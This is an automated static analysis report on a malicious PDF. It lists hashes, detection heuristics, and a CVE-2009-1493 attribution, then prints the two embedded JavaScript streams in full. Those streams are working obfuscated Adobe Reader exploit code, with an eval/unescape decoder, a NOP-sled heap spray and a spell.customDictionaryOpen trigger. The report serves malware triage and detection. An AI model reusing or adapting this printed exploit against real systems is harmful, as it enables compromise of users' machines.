Malicious PDF — malware analysis report

Static analysis result for SHA-256 506063876cdbfed5…

MALICIOUS

PDF

3.5 KB Created: 2008-09-07 22:47:39 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12; modified using iText 2.1.7 by 1T3XT) First seen: 2026-05-09
MD5: ef26263a473a340a1984cdfe56f9dacc SHA-1: b1dd9adabc06bdfc50507ec86455b29baf8a4410 SHA-256: 506063876cdbfed5c55a59d517157bce7ba5977b2245e57d5e8bcfbe2ba47292
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged by an ML classifier as malicious with a high probability. Static analysis revealed embedded JavaScript streams, some of which exhibit obfuscation techniques like string concatenation and the use of String.fromCharCode. These scripts are likely responsible for downloading and executing a second-stage payload, as indicated by the heuristic firings and the presence of obfuscated JavaScript artifacts. The specific intent of the scripts could not be fully determined due to obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink spell.customDictionaryOpen, associated with CVE-2009-1493. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    <</Length 4699>>stream
Dge3=unescape;ZIH7=eval;var e2comxCBqv; var arry = new Array();  function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; }  function n2lbxFRP(zeDMLD5frG) { ZIH7(Rml0('dyt7ZE8dQu#=#Wtv6("*f5656")@'));  var rnpYjm6yK = 0x400000; var qBA9mGHA27 = wbg2AV1wJf.length * 2; var mYElRxzI = rnpYjm6yK - (qBA9mGHA27 + 0x38); var li0FOx2smh = Dge3("%u9090%u9090"); li0FOx2smh = kCCcRxkpD(li0FOx2smh, mYElRxzI); var jGg35eYFr = (i4OIQMm1N …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x352 2011 bytes
SHA-256: 11f80de48d734fed06c41582df98b48fe9c1ace0a18d5ba0b5126476b3c8dc07
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Dge3=unescape;ZIH7=eval;var e2comxCBqv; var arry = new Array();  function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; }  function n2lbxFRP(zeDMLD5frG) { ZIH7(Rml0('dyt7ZE8dQu#=#Wtv6("*f5656")@'));  var rnpYjm6yK = 0x400000; var qBA9mGHA27 = wbg2AV1wJf.length * 2; var mYElRxzI = rnpYjm6yK - (qBA9mGHA27 + 0x38); var li0FOx2smh = Dge3("%u9090%u9090"); li0FOx2smh = kCCcRxkpD(li0FOx2smh, mYElRxzI); var jGg35eYFr = (i4OIQMm1NE - 0x400000) / rnpYjm6yK; for(var uNDuvIksm = 0; uNDuvIksm < jGg35eYFr; uNDuvIksm++) { gG7kzCEt[uNDuvIksm] = li0FOx2smh + wbg2AV1wJf; } } function viB7XF4GK() { app.clearTimeOut(e2comxCBqv);  if(spell.customDictionaryOpen()) { ZIH7(Rml0('ezi#dyt7ZE8dQu#=#Wtv6("*f5656")@')); var hWq500CN = wbg2AV1wJf.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = Dge3("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){arry[vqcQD96y] = yarsp + wbg2AV1wJf;} var tUMhNbGw = Dge3("%09"); while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw; tUMhNbGw = "N." + tUMhNbGw; ZIH7(Rml0('zkk.wlx.Xloozy.tvgRxlm(gFNsMyTd)@')); } } app.rAiDs74Nu6 = viB7XF4GK; e2comxCBqv = app.setTimeOut("app.rAiDs74Nu6()", 10);  function Ducc(arZ7, XpY3, bhD5) { var iIyw; iIyw=arZ7.split(XpY3); var Lxe2=iIyw.join(bhD5); return Lxe2;/**/ } function Rml0(Mqo5) { Mqo5 = Ducc(Mqo5,"##+##","'"); Mqo5 = Ducc(Mqo5,"##|##","\\"); Lxe2=""; frt8 =""; for(k=0;k<Mqo5.length;k++) { Lxe2 = Mqo5.charCodeAt(k); if (Lxe2==32){Lxe2=35} else if (Lxe2==35){Lxe2=32} else if (Lxe2==59){Lxe2=64} else if (Lxe2==64){Lxe2=59} else if (Lxe2==37){Lxe2=42} else if (Lxe2==42){Lxe2=37} else if (Lxe2>=97 && Lxe2<=122) { Lxe2=Lxe2-97;Lxe2=25-Lxe2;Lxe2+=97; }else if (Lxe2>=65 && Lxe2<=90) { Lxe2=Lxe2-65;Lxe2=25-Lxe2;Lxe2+=65; }else if (Lxe2>=48 && Lxe2<=57) { Lxe2=Lxe2-48;Lxe2=9-Lxe2;Lxe2+=48; } frt8 += String.fromCharCode(Lxe2); } return frt8;/**/ }
javascript_obj0013_002.js pdf-javascript-stream PDF /JS object 13 at offset 0x372 2707 bytes
SHA-256: e62e086026b18630ec987cb580ca4d910e02ca523981a51b983af93607fc5ccf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Dge3=unescape;ZIH7=eval;var e2comxCBqv; var arry = new Array();  function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; }  function n2lbxFRP(zeDMLD5frG) { ZIH7(Rml0('dyt7ZE8dQu#=#Wtv6("*f5656")@'));  var rnpYjm6yK = 0x400000; var qBA9mGHA27 = wbg2AV1wJf.length * 2; var mYElRxzI = rnpYjm6yK - (qBA9mGHA27 + 0x38); var li0FOx2smh = Dge3("%u9090%u9090"); li0FOx2smh = kCCcRxkpD(li0FOx2smh, mYElRxzI); var jGg35eYFr = (i4OIQMm1NE - 0x400000) / rnpYjm6yK; for(var uNDuvIksm = 0; uNDuvIksm < jGg35eYFr; uNDuvIksm++) { gG7kzCEt[uNDuvIksm] = li0FOx2smh + wbg2AV1wJf; } } function viB7XF4GK() { app.clearTimeOut(e2comxCBqv);  if(spell.customDictionaryOpen()) { ZIH7(Rml0('ezi#dyt7ZE8dQu#=#Wtv6("*f5656")@')); var hWq500CN = wbg2AV1wJf.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = Dge3("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){arry[vqcQD96y] = yarsp + wbg2AV1wJf;} var tUMhNbGw = Dge3("%09"); while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw; tUMhNbGw = "N." + tUMhNbGw; ZIH7(Rml0('zkk.wlx.Xloozy.tvgRxlm(gFNsMyTd)@')); } } app.rAiDs74Nu6 = viB7XF4GK; e2comxCBqv = app.setTimeOut("app.rAiDs74Nu6()", 10);  function Ducc(arZ7, XpY3, bhD5) { var iIyw; iIyw=arZ7.split(XpY3); var Lxe2=iIyw.join(bhD5); return Lxe2;/**/ } function Rml0(Mqo5) { Mqo5 = Ducc(Mqo5,"##+##","'"); Mqo5 = Ducc(Mqo5,"##|##","\\"); Lxe2=""; frt8 =""; for(k=0;k<Mqo5.length;k++) { Lxe2 = Mqo5.charCodeAt(k); if (Lxe2==32){Lxe2=35} else if (Lxe2==35){Lxe2=32} else if (Lxe2==59){Lxe2=64} else if (Lxe2==64){Lxe2=59} else if (Lxe2==37){Lxe2=42} else if (Lxe2==42){Lxe2=37} else if (Lxe2>=97 && Lxe2<=122) { Lxe2=Lxe2-97;Lxe2=25-Lxe2;Lxe2+=97; }else if (Lxe2>=65 && Lxe2<=90) { Lxe2=Lxe2-65;Lxe2=25-Lxe2;Lxe2+=65; }else if (Lxe2>=48 && Lxe2<=57) { Lxe2=Lxe2-48;Lxe2=9-Lxe2;Lxe2+=48; } frt8 += String.fromCharCode(Lxe2); } return frt8;/**/ } 

endstream
endobj
14 0 obj
<</Creator(Scribus 1.3.3.12)/Title<>/Producer(Scribus PDF Library 1.3.3.12; modified using iText 2.1.7 by 1T3XT)/Author<>/Keywords<>/Trapped/False/ModDate(D:20091014160541+08'00')/CreationDate(D:20080907224739)>>
endobj
xref
0 15
0000000000 65535 f 
0000000015 00000 n 
0000000242 00000 n 
0000000260 00000 n 
0000000302 00000 n 
0000000381 00000 n 
0000000410 00000 n 
0000000430 00000 n 
0000000468 00000 n 
0000000528 00000 n 
0000000679 00000 n 
0000000727 00000 n 
0000000806 00000 n 
0000000850 00000 n 
0000005593 00000 n 
trailer
<</Info 14 0 R/Root 1 0 R/Size 15/ID [<cb1ea88230e04faa2692ffde7e8ddedc><f43c5f9abe76c261193b22615be36de0>]>>
startxref
5822
%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.